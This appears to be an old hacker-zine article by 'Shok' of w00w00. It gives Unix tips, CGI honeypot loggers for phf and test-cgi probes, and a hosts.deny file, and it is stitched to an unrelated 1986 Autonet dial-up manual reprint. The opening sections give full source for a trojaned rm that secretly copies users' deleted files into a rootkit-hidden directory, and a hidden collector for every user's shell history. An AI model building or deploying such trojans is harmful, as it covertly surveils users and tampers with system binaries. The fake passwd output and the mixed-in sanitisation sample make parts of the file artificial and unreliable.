shok@dataforce.net, shok@sekurity.org

What I plan for this to be, is some various utilities that you might think
as of use and what not. This is mainly a few security tips that I like to
use.

First off, edit your /etc/profile, and add the line:

    export HISTFILE=/tmp/hist/`whoami`

and then do:

    mkdir /tmp/hist;chmod 1777 /tmp/hist

You now want to hide that file, so the users don't see the dir (it can be
seen with set but not too many people check :) and you hide it with the
rootkit's ls.

Another few things I like to do. I made a trojaned 'rm' that basically
calls /bin/rm.bak which is hidden (via rootkit ls), and it copies the file
they are trying to delete to /tmp/fill (which is also hidden via rootkit
ls). There are two versions of this....I wrote the first one in shell
script, but due to the fact it has to be a+r, I wrote it in C afterwards.

Here is the rm.sh:

    #!/bin/sh
    # rm trojan, stores files in a temp directory, that is +tw, but go-r
    # the directory this writes to should be hidden with a trojaned ls
    # (via rootkit)
    # this is just an example...USE rm.c ;)

    if [ $# -gt 1 ]
    then
        case $1 in
        -i|--interactive)
            shift
            cp -f $* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -i $*
            ;;
        -f|--force)
            shift
            cp -f $* /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -f $*
            ;;
        -d|--directory)
            shift
            cp $1/* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -d $*
            ;;
        -v|--verbose)
            shift
            cp -f $* /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -v $*
            ;;
        -r|-R|--recursive)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -R $*
            ;;
        -ri)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -ri $*
            ;;
        -Ri)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -ri $*
            ;;
        -rf|-Rf)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            cp -f $1 /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -rf $*
            ;;
        -rd|-Rd)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -rd $*
            ;;
        -rv|-Rv)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            doexec /bin/rm.bak rm -rv $*
            ;;
        -fv)
            shift
            cp -f $1 /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -fv $*
            ;;
        -rfv|-Rfv)
            shift
            cp -f $1/* /tmp/fill >/dev/null 2>&1
            cp -f $1 /tmp/fill >/dev/null 2>&1
            /bin/rm.bak -rfv $*
            ;;
        *)
            cp -f $* /tmp/fill >/dev/null 2>&1
            /bin/rm.bak $*
            ;;
        esac
    else
        IT=$1
        cp -f $IT /tmp/fill
        /bin/rm.bak $IT
    fi

If you do not have the program doexec, write it like this:

    #include <stdio.h>
    #include <unistd.h>

    /* doexec PATH ARGV0 [ARGS...]: run PATH with the given argument list. */
    int main(int argc, char **argv)
    {
        if (argc < 3)
            return 1;
        execv(argv[1], argv + 2);
        perror(argv[1]);    /* only reached if the exec failed */
        return 1;
    }

Now for rm.c:

    /* ------------------------------------------------------ */
    /* rm.c -- rm "trojan" by Shok (Matt Conover)             */
    /* ------------------------------------------------------ */
    /* Email: shok@dataforce.net, shok@sekurity.org           */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        int i, c;
        int recursive = 0;

        if (argc < 2)
            exit(0);

        /* Only -R/-r changes what gets copied; -i, -f and -v are */
        /* accepted here and handed to the real rm untouched.     */
        while ((c = getopt(argc, argv, "Rrifv")) != -1)
            switch (c) {
            case 'R':
            case 'r':
                recursive = 1;
                break;
            case 'i':
            case 'f':
            case 'v':
                break;
            case '?':
                exit(1);
            default:
                break;
            }

        /* Copy every operand to /tmp/fill before it is deleted. */
        for (i = optind; i < argc; i++) {
            setenv("PROGRAM", argv[i], 1);
            if (recursive)
                system("cp -f \"$PROGRAM\"/* /tmp/fill >/dev/null 2>&1");
            else
                system("cp -f \"$PROGRAM\" /tmp/fill >/dev/null 2>&1");
            unsetenv("PROGRAM");
        }

        /* Hand the original command line to the real rm. */
        argv[0] = "rm";
        execv("/bin/rm.bak", argv);
        perror("/bin/rm.bak");
        return 1;
    }

This program can of course be improved,
especially replacing the strcmp's with getopt() but I could care less....

Now when ever a user deletes something it will first be copied to /tmp/fill
before it's deleted.

Now, even though it's logged to /var/log/httpd/access_log, I'd like to know
right away when someone tries to use the phf or test-cgi vulnerabilities on
me. So I replaced the phf and test-cgi programs in my /cgi-bin/ with this.
The first will get the info on who it is, then it will send a fake passwd
file. This can be improved of course but I don't care to take the time.

phf.c:

    /* w00w00! */
    /* phf trojan */
    /* -------------------------------------------------------------------- */
    /* Just a little utility to log information about who is exploiting us. */
    /* Will mail it to root of local host, with the IP address, the web     */
    /* browser, the query string, etc. It will then return a fake password  */
    /* below which can be modified.                                         */
    /*                                                                      */
    /* Shok (Matt Conover)                                                  */
    /* shok@dataforce.net, shok@sekurity.org                                */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <syslog.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    /* List of defines */
    #define ERROR -1
    #define IP ""        /* Set this to your IP address. */
    #define ADMIN "root" /* Set this to the user (or address) of the person */
                         /* to get phf attempts. */
    #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
    #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
                                 /* program but this is to specify the */
                                 /* path. */

    /* This returns a '404 File Not Found' to the client. */
    #define PRNSERVERR() printf("Content-type: text/html\n\n"); \
        printf("<HTML><HEAD>\n"); \
        printf("<TITLE>404 File Not Found</TITLE></HEAD>\n"); \
        printf("<BODY>\n"); \
        printf("<H1>File Not Found</H1>\n"); \
        printf("The requested URL was not found on this server.<P>\n"); \
        printf("</BODY></HTML>\n"); \
        fflush(stdout), fflush(stderr);

    /* Free up our structures before exiting. */
    #define FREEALL() free(buf), free(cmdarg), free(address);

    /* ------------------ */

    int main(void)
    {
        int pid;
        int fd[2];

        char *buf = malloc(4096);
        char *cmdarg = malloc(512);
        char *address = malloc(256);

        char *host = getenv("REMOTE_HOST");
        char *addr = getenv("REMOTE_ADDR");
        char *browser = getenv("HTTP_USER_AGENT");
        char *query_string = getenv("QUERY_STRING");

        /* We check each malloc separately so we can free */
        /* any previously malloc()'d buffers. */
        if (buf == NULL) {
            perror("malloc");
            PRNSERVERR();
            exit(ERROR);
        } else memset(buf, 0, 4096);

        if (cmdarg == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf);
            exit(ERROR);
        } else memset(cmdarg, 0, 512);

        if (address == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf), free(cmdarg);
            exit(ERROR);
        } else memset(address, 0, 256);

        /* The server may leave any of these unset. */
        if (host == NULL) host = "";
        if (addr == NULL) addr = "";
        if (browser == NULL) browser = "";
        if (query_string == NULL) query_string = "";

        /* ----------------------------- */

        if (pipe(fd) == ERROR) {
            perror("pipe");
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if ((pid = fork()) == ERROR) {
            openlog("phf", LOG_PID, LOG_USER);
            syslog(LOG_ERR, "Unable to fork().");
            closelog();
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if (pid == 0) {
            close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
            dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
            dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

            /* '@' + host + NUL must fit in the 256-byte buffer. */
            sprintf(address, "@%.*s", 256 - 2, host);

            /* Log information. */
            printf("The following person used phf!!\n\n");
            printf("\tHost: %s\n", host);
            printf("\tAddress: %s\n", addr);
            printf("\tBrowser type: %s\n", browser);
            printf("\tQuery String (i.e. command entered): %s\n\n", query_string);
            printf("Information collected from fingering host (if any):\n");
            printf("---------------------------------------------------\n\n");
            fflush(stdout);

            if ((strcmp(addr, IP) != 0) && (strcmp(addr, "") != 0))
                execl(FINGERPROG, "finger", address, (char *)NULL);
            else
                printf("[from the localhost (%s)]\n", IP);

            printf(".\n"); /* Terminate 'mail'. */
            /* --------------- */
            FREEALL();
            exit(0);
        } else {
            close(fileno(stdin)), close(fd[1]);
            dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */

            wait(NULL); /* Wait for child to completely finish before starting. */

            /* Setup the subject to send to mail. */
            snprintf(cmdarg, 512, "PHF ATTEMPT FROM %s!", host);

            /* fork() another child to execute the mail program. */
            if ((pid = fork()) == ERROR) {
                perror("fork");
                PRNSERVERR();
                FREEALL();
                exit(ERROR);
            }

            if (pid == 0) {
                execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
                _exit(ERROR); /* exec failed; don't fall through as the CGI */
            }
        }

        /* Send a fake password file.. if there is a "cat" and "/etc/passwd" */
        /* in the QUERY_STRING. Otherwise report file not found (this can    */
        /* cause problems if they first send a cat /etc/passwd and then send */
        /* an xterm request for example.                                     */
        if (strstr(query_string, "cat") && strstr(query_string, "/etc/passwd")) {
            printf("Content-type: text/html\n\n");
            printf("<HTML><HEAD>\n");
            printf("<TITLE>Query Results</TITLE></HEAD>\n");
            printf("<BODY><H1>Query Results</H1>\n");
            printf("<P>\n");
            printf("/usr/local/bin/ph -m alias=x \n");
            printf("cat /etc/passwd\n");
            printf("<PRE>\n");
            printf("sysdiag:*:0:1:System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
            printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
            printf("www:*:50:50:World Wide Web:/home/www:/usr/bin/bash\n");
            printf("pop:*:60:60:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
            printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
            printf("john:Vf84.y4kl/:4120:18:John Preston:/usr/john:/usr/bin/bash\n");
            printf("pcguest::7454:100:Guest Account:/tmp:/usr/bin/sh\n");
            printf("pscoot:Em8y0pwT.5umo:8930:100:Pike Scoot:/home/pscoot:/usr/bin/bash\n");
            printf("shok:aDrsBsefYr:666:100:Matt Conover:/home/shok:/bin/bash\n");
            printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
            printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
            printf("jsmith:Fdd34cDfc:8940:100:Jim Smith:/home/jsmith:/usr/bin/bash\n");
            printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
            printf("</PRE>\n");
            printf("</BODY></HTML>\n");
        } else {
            PRNSERVERR();
        }

        FREEALL();
        return 0;
    }

test-cgi.c:

    /* w00w00! */
    /* test-cgi trojan */
    /* -------------------------------------------------------------------- */
    /* Just a little utility to log information about who is exploiting us. */
    /* Will mail it to root of local host, with the IP address, the web     */
    /* browser, the query string, etc. It will then return a File Not Found */
    /* error.                                                               */
    /*                                                                      */
    /* Shok (Matt Conover)                                                  */
    /* shok@dataforce.net, shok@sekurity.org                                */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <syslog.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    /* List of defines */
    #define ERROR -1
    #define IP ""        /* Set this to your IP address. */
    #define ADMIN "root" /* Set this to the user (or address) of the person */
                         /* to get phf attempts. */
    #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
    #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
                                 /* program but this is to specify the */
                                 /* path. */

    /* This returns a '404 File Not Found' to the client. */
    #define PRNSERVERR() printf("Content-type: text/html\n\n"); \
        printf("<HTML><HEAD>\n"); \
        printf("<TITLE>404 File Not Found</TITLE></HEAD>\n"); \
        printf("<BODY>\n"); \
        printf("<H1>File Not Found</H1>\n"); \
        printf("The requested URL was not found on this server.<P>\n"); \
        printf("</BODY></HTML>\n"); \
        fflush(stdout), fflush(stderr);

    /* Free up our structures before exiting. */
    #define FREEALL() free(buf), free(cmdarg), free(address);

    /* ------------------ */

    int main(void)
    {
        int pid;
        int fd[2];

        char *buf = malloc(4096);
        char *cmdarg = malloc(512);
        char *address = malloc(256);

        char *host = getenv("REMOTE_HOST");
        char *addr = getenv("REMOTE_ADDR");
        char *browser = getenv("HTTP_USER_AGENT");
        char *query_string = getenv("QUERY_STRING");

        /* We check each malloc separately so we can free */
        /* any previously malloc()'d buffers. */
        if (buf == NULL) {
            perror("malloc");
            PRNSERVERR();
            exit(ERROR);
        } else memset(buf, 0, 4096);

        if (cmdarg == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf);
            exit(ERROR);
        } else memset(cmdarg, 0, 512);

        if (address == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf), free(cmdarg);
            exit(ERROR);
        } else memset(address, 0, 256);

        /* The server may leave any of these unset. */
        if (host == NULL) host = "";
        if (addr == NULL) addr = "";
        if (browser == NULL) browser = "";
        if (query_string == NULL) query_string = "";

        /* ----------------------------- */

        if (pipe(fd) == ERROR) {
            perror("pipe");
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if ((pid = fork()) == ERROR) {
            openlog("test-cgi", LOG_PID, LOG_USER);
            syslog(LOG_ERR, "Unable to fork().");
            closelog();
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if (pid == 0) {
            close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
            dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
            dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

            /* '@' + host + NUL must fit in the 256-byte buffer. */
            sprintf(address, "@%.*s", 256 - 2, host);

            /* Log information. */
            printf("The following person used test-cgi!\n\n");
            printf("\tHost: %s\n", host);
            printf("\tAddress: %s\n", addr);
            printf("\tBrowser type: %s\n", browser);
            printf("\tQuery String (i.e. command entered): %s\n\n", query_string);
            printf("Information collected from fingering host (if any):\n");
            printf("---------------------------------------------------\n\n");
            fflush(stdout);

            /* Compare the client address (not the "@host" finger target). */
            if ((strcmp(addr, IP) != 0) && (strcmp(addr, "") != 0))
                execl(FINGERPROG, "finger", address, (char *)NULL);
            else
                printf("[from the local host (%s)]\n", IP);

            printf(".\n"); /* Terminate 'mail'. */
            /* --------------- */
            FREEALL();
            exit(0);
        } else {
            close(fileno(stdin)), close(fd[1]);
            dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */

            wait(NULL); /* Wait for child to completely finish before starting. */

            /* Setup the subject to send to mail. */
            snprintf(cmdarg, 512, "TEST-CGI ATTEMPT FROM %s!", host);

            /* fork() another child to execute the mail program. */
            if ((pid = fork()) == ERROR) {
                perror("fork");
                PRNSERVERR();
                FREEALL();
                exit(ERROR);
            }

            if (pid == 0) {
                execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
                _exit(ERROR); /* exec failed; don't fall through as the CGI */
            }
        }

        PRNSERVERR(); /* Just return 404 File Not Found. */
        FREEALL();
        return 0;
    }

Just as an added bonus here.........

When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I edited my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

    ErrorDocument 401 /cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs by the 'user'
part, which lets you know what user it was...this is a good way to know if
there is an unauthorized attempt, and/or what user is logging into your
webpage that is secured......

unauthorized.c:

    /* w00w00! */
    /* Unauthorized access catcher. */
    /* -------------------------------------------------------------------- */
    /* Just a little utility to log information about who is unauthorized   */
    /* to access the web page. Will mail it to root of local host, with the */
    /* IP address, the web browser, user, ident, the query string, etc.     */
    /*                                                                      */
    /* Shok (Matt Conover)                                                  */
    /* shok@dataforce.net, shok@sekurity.org                                */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <syslog.h>
    #include <sys/types.h>
    #include <sys/wait.h>

    /* List of defines */
    #define ERROR -1
    #define ADMIN "root" /* Set this to the user (or address) of the person */
                         /* to get phf attempts. */
    #define IP ""        /* Set this to your IP address. */
    #define FINGERPROG "/usr/bin/finger" /* Set to path of 'finger'. */
    #define MAILPROG "/bin/mail" /* This does have to be the 'mail' */
                                 /* program but this is to specify the */
                                 /* path. */

    /* This returns a '404 File Not Found' to the client. */
    #define PRNSERVERR() printf("Content-type: text/html\n\n"); \
        printf("<HTML><HEAD>\n"); \
        printf("<TITLE>404 File Not Found</TITLE></HEAD>\n"); \
        printf("<BODY>\n"); \
        printf("<H1>File Not Found</H1>\n"); \
        printf("The requested URL was not found on this server.<P>\n"); \
        printf("</BODY></HTML>\n"); \
        fflush(stdout), fflush(stderr);

    /* Free up our structures before exiting. */
    #define FREEALL() free(buf), free(cmdarg), free(address);

    /* ------------------ */

    int main(void)
    {
        int pid;
        int fd[2];

        char *buf = malloc(4096);
        char *cmdarg = malloc(512);
        char *address = malloc(256);

        char *host = getenv("REMOTE_HOST");
        char *addr = getenv("REMOTE_ADDR");
        char *user = getenv("REMOTE_USER");
        char *ident = getenv("REMOTE_IDENT");
        char *browser = getenv("HTTP_USER_AGENT");
        char *query_string = getenv("QUERY_STRING");

        /* We check each malloc separately so we can free */
        /* any previously malloc()'d buffers. */
        if (buf == NULL) {
            perror("malloc");
            PRNSERVERR();
            exit(ERROR);
        } else memset(buf, 0, 4096);

        if (cmdarg == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf);
            exit(ERROR);
        } else memset(cmdarg, 0, 512);

        if (address == NULL) {
            perror("malloc");
            PRNSERVERR();
            free(buf), free(cmdarg);
            exit(ERROR);
        } else memset(address, 0, 256);

        /* The server may leave any of these unset. */
        if (host == NULL) host = "";
        if (addr == NULL) addr = "";
        if (user == NULL) user = "";
        if (ident == NULL) ident = "";
        if (browser == NULL) browser = "";
        if (query_string == NULL) query_string = "";

        /* ----------------------------- */

        if (pipe(fd) == ERROR) {
            perror("pipe");
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if ((pid = fork()) == ERROR) {
            openlog("httpd: unauthorized.cgi", LOG_PID, LOG_USER);
            syslog(LOG_ERR, "Unable to fork().");
            closelog();
            PRNSERVERR();
            FREEALL();
            exit(ERROR);
        }

        if (pid == 0) {
            close(fileno(stdout)), close(fileno(stderr)), close(fd[0]);
            dup2(fd[1], fileno(stdout)); /* Send all output to the pipe's output. */
            dup2(fd[1], fileno(stderr)); /* Send all errors to the pipe. */

            /* '@' + host + NUL must fit in the 256-byte buffer. */
            sprintf(address, "@%.*s", 256 - 2, host);

            /* Log information. */
            printf("The following person used phf!!\n\n");
            printf("\tHost: %s\n", host);
            printf("\tAddress: %s\n", addr);
            printf("\tUser: %s\n", user);
            printf("\tIdent: %s\n", ident);
            printf("\tBrowser type: %s\n", browser);
            printf("\tQuery String (i.e. command entered): %s\n\n", query_string);
            printf("Information collected from fingering host (if any):\n");
            printf("---------------------------------------------------\n\n");
            fflush(stdout);

            if ((strcmp(addr, IP) != 0) && (strcmp(addr, "") != 0))
                execl(FINGERPROG, "finger", address, (char *)NULL);
            else
                printf("[from the local host (%s)]\n", IP);

            printf(".\n"); /* Terminate 'mail'. */
            /* --------------- */
            FREEALL();
            exit(0);
        } else {
            close(fileno(stdin)), close(fd[1]);
            dup2(fd[0], fileno(stdin)); /* Send all input to the pipe's input. */

            wait(NULL); /* Wait for child to completely finish before starting. */

            /* Setup the subject to send to mail. */
            snprintf(cmdarg, 512, "UNAUTHORIZED FROM %s!", host);

            /* fork() another child to execute the mail program. */
            if ((pid = fork()) == ERROR) {
                perror("fork");
                PRNSERVERR();
                FREEALL();
                exit(ERROR);
            }

            if (pid == 0) {
                execl(MAILPROG, "mail", "-s", cmdarg, ADMIN, (char *)NULL);
                _exit(ERROR); /* exec failed; don't fall through as the CGI */
            }
        }

        printf("Content-type: text/html\n\n");
        printf("<HTML><HEAD>\n");
        printf("<TITLE>401 Unauthorized Access</TITLE></HEAD>\n");
        printf("<BODY>\n");
        printf("<H1>Unauthorized Access</H1>\n");
        printf("You are unauthorized to access the requested URL.<P>\n");
        printf("</BODY></HTML>\n");
        FREEALL();
        return 0;
    }

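An added example, not Shok's or w00w00's code: the three CGI loggers above put REMOTE_HOST, HTTP_USER_AGENT and QUERY_STRING into the alert mail as received and match "cat" and "/etc/passwd" on the raw query string. The sketch below shows bounded, NULL-safe, control-character-free handling of those fields and matching on the URL-decoded query; the helper names (clean_field, decode_query, is_passwd_probe, build_subject) and the sample values are constructed for illustration.

```c
/* Added example: input handling for a CGI probe logger.          */
/* Helper names are hypothetical; sample values are constructed.  */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD_MAX 256

/* Constructed sample: a probe whose separator and slashes are percent-encoded, */
/* so a strstr() for "/etc/passwd" on the raw string finds nothing.             */
static const char SAMPLE_QUERY[] = "Qalias=x%0acat%20%2Fetc%2Fpasswd";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Copy a CGI variable for logging: unset/empty becomes "-", anything that */
/* is not printable ASCII (CR, LF, ESC, ...) becomes '?', output is bounded. */
size_t clean_field(const char *in, char *out, size_t outsz)
{
    size_t n = 0;

    if (outsz == 0) return 0;
    if (in == NULL || *in == '\0') in = "-";
    for (; *in && n + 1 < outsz; in++)
        out[n++] = isprint((unsigned char)*in) ? *in : '?';
    out[n] = '\0';
    return n;
}

/* URL-decode a query string (%XX and '+'), then clean it as above. */
/* Malformed escapes are kept literally; %00 cannot end the string. */
size_t decode_query(const char *in, char *out, size_t outsz)
{
    char raw[FIELD_MAX];
    size_t n = 0;
    int hi, lo;

    if (in == NULL) in = "";
    while (*in && n + 1 < sizeof raw) {
        if (*in == '%' && (hi = hexval((unsigned char)in[1])) >= 0
                       && (lo = hexval((unsigned char)in[2])) >= 0) {
            int byte = hi * 16 + lo;
            raw[n++] = byte ? (char)byte : '?';
            in += 3;
        } else {
            raw[n++] = (*in == '+') ? ' ' : *in;
            in++;
        }
    }
    raw[n] = '\0';
    return clean_field(raw, out, outsz);
}

/* Same test as the page's phf.c, but on the decoded query. */
int is_passwd_probe(const char *query)
{
    char q[FIELD_MAX];

    decode_query(query, q, sizeof q);
    return strstr(q, "cat") != NULL && strstr(q, "/etc/passwd") != NULL;
}

/* Build the mail subject in a caller-sized buffer; -1 means it was truncated. */
int build_subject(char *out, size_t outsz, const char *tag, const char *host)
{
    char h[FIELD_MAX];
    int n;

    clean_field(host, h, sizeof h);
    n = snprintf(out, outsz, "%s ATTEMPT FROM %s!", tag, h);
    return (n >= 0 && (size_t)n < outsz) ? 0 : -1;
}

int main(void)
{
    char host[FIELD_MAX], agent[FIELD_MAX], query[FIELD_MAX], subject[128];
    const char *qs = getenv("QUERY_STRING");

    clean_field(getenv("REMOTE_HOST"), host, sizeof host);
    clean_field(getenv("HTTP_USER_AGENT"), agent, sizeof agent);
    decode_query(qs ? qs : SAMPLE_QUERY, query, sizeof query);
    build_subject(subject, sizeof subject, "PHF", getenv("REMOTE_HOST"));

    printf("Subject: %s\n\tHost: %s\n\tBrowser type: %s\n\tQuery: %s\n\tpasswd probe: %s\n",
           subject, host, agent, query,
           is_passwd_probe(qs ? qs : SAMPLE_QUERY) ? "yes" : "no");
    return 0;
}
```

The subject string is meant to be passed to mail as its own argument after "-s", so it needs no shell quoting.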
       Here is my hosts.deny too.........in case you wanted to see it ;)
       in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root
       #FINGER - Noisy people
       in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root & 
       #Security reasons
       in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
       in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
       #in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &
       # PORTMAP 
       portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &
       in.comsat:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &
       in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &
       in.rshd:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &
       in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &
       rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &
       #ALL: paranoid
       Well.......................................we're winding down to the end.
       It has been fun and I don't have much more to say on this article.
       Thanks for reading, please feel free to use and distribute this, although
       I wish for you to leave my comments and "header" at the tops ... ya know
       my "copyright" :) 
       You can access a few of my things at ftp.w00w00.org or
                          Shok (Matt Conover)
       Email: shok@dataforce.net, shok@sekurity.org
  RAW.1 We remember Autonet'86
                "information wants to be stolen" 
                                            - Anonymous
        Remember when this was new info? just gleaned from the new uploads
       directory of your favourite applecat board pre-ibm and fcp emulex? 
       well you're probably on the sysadmin side of things now huh? or not
       ... *g*
       [ Hacker Supreme's - Hackers Directory Volume # 34 ]
       [    Compiled by: Ninja Squirrel and Logan - 5     ]
       [ Hack Copyright: Hacker Supreme 1986 ]
       [ AUTONET SERIES (Section 1) ]
                                    HOW TO CONNECT TO AUTONET
                 To establish a connection to Autonet,  simply  follow  the  steps
                 listed below.
                  1. Dial your local access number and  wait  for  a  high-pitched
                     NOTE: If you are using a direct-connect terminal, proceed  to
                     Step 3.
                  2. Switch data set to DATA, or place the telephone receiver fir-
                     mly in the acoustic coupler, orienting the cord as indicated.
                  3. Press the RETURN key two times.
                  4. Autonet will respond with:
                             Autonet Line xxxxxxxxxx
                  5. Type one or more of the connection dialog commands  described
                     on  the  following pages. The appropriate C or ID command and
                     corresponding name or number will be provided to you when you
                     become  an  Autonet user. The H and T commands may be used in
                     conjunction with either of these.
                                          SAMPLE SESSION
                         User entries are shown in square brackets ([ ]).
                                 [  ]
                                 Autonet Line 3130157042
                                 Command: [ C NAME;H;T D1 ]
                     Autonet will respond to this dialog by:
                         (1) setting  the  correct  parameters  for  your terminal
                         (2) typing out the connection dialog HELP file
                         (3) connecting you to your destination and  issuing  this
                             CALL CONNECTED
                 COMMAND FORMAT              FUNCTION              EXAMPLE
                 C nnnnnnnnnn   Requests a connection to a host    C 5555
                                whose address is nnnnnnnnnn.   
                 C cccccccccc   Requests a connection to a host    C NAME
                                whose name is cccccccccc.      
                 H              Prints this list of commands.      H
                 ID xxxxxxxxx   Identifies the user and re-        ID 1234-567
                                quests a  connection  to  the
                                host  associated  with  the    
                                user's identity code xxxxxxxxx.
                 T cn           Identifies a terminal model by     T D1
                                the terminal identity code cn.
                                See the TERMINAL option of AID.
                    * Use a space to separate a command name and its parameter.
                        ** Use a semicolon (;) to separate commands which
                                      occupy the same line.
                       In all examples, information the user types is shown
                                    in square brackets ([ ]).
                                           The C Command
                 PURPOSE         The  C  command  requests  a connection to a sub-
                                 scribing host computer. The particular  host  can
                                 be  specified by a numerical address, or, through
                                 special arrangements, by an alphabetic name.  The
                                 terminal  session  is  charged to the subscribing
                 GENERAL FORM    C nnnnnnnnnn
                                 nnnnnnnnnn  is  the  numeric  address assigned by
                                 Autonet to the host computer.
                                 C cccccccccc
                                 cccccccccc is the alphabetic name chosen  by  the
                                subscriber for the host computer.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ C 5555 ]
                                 CALL CONNECTED
                                 (Proceed with host log-on procedure.)
                 NOTES           If no host exists at the given address or by  the
                                 given name, the user will receive the message:
                                         ?**No such host.
                                 If the subscribing host will not accept the char-
                                 ges, the user will receive the message:
                                       ?**User ID required.
                                          The ID Command
                 PURPOSE         The ID command identifies the user and requests a
                                 connection  to  the  host  associated  with  that
                                 user's  identification  code.  The  network  will
                                 require the user to enter a valid password before
                                 completing the connection. The  terminal  session
                                 is charged to the user.
                 GENERAL FORM    ID xxxxxxxxx
                                 xxxxxxxxx is an alphanumeric user  identification
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ ID 1234-567 ]
                                 CALL CONNECTED
                                 (Proceed with host log-on procedure.)
                 NOTES           To  connect  to  a  destination  other  than  the
                                 default host, use the C  command  in  conjunction
                                 with the ID command.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ ID 2345-12;C 5555 ]
                                 CALL CONNECTED
                                 Proceed with the host log-on procedure.
                                           The H Command
                 PURPOSE         The H command prints a connection dialog command
                                 summary as a helpful reminder for users. The H
                                 command may be used in conjunction with other
                                 commands, or it may be used as a single command
                                 PRIOR to issuing the C or the ID commands. If
                                 used individually, the network will follow the
                                 summary display with a prompt for another com-
                 GENERAL FORM    H
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ H ]
                                 Autonet displays Command Summary.
                 EXAMPLE         Autonet Line 3130157042
                                 Command:[ H;C 5555 ]
                                 Autonet displays Command Summary.
                                 CALL CONNECTED
                                 (Proceed with host system log-on procedures.)
                                           The T Command
                 PURPOSE         The T command identifies the user's terminal
                                 model so that the network can set certain
                                 operating parameters to optimize the terminal's
                                 characteristics. The T command may be used in
                                 conjunction with other commands, or it may be
                                 used as a single command PRIOR to issuing the C
                                 or the ID commands. If used individually, the
                                 network will establish the correct parameters
                                 and will prompt for another command.
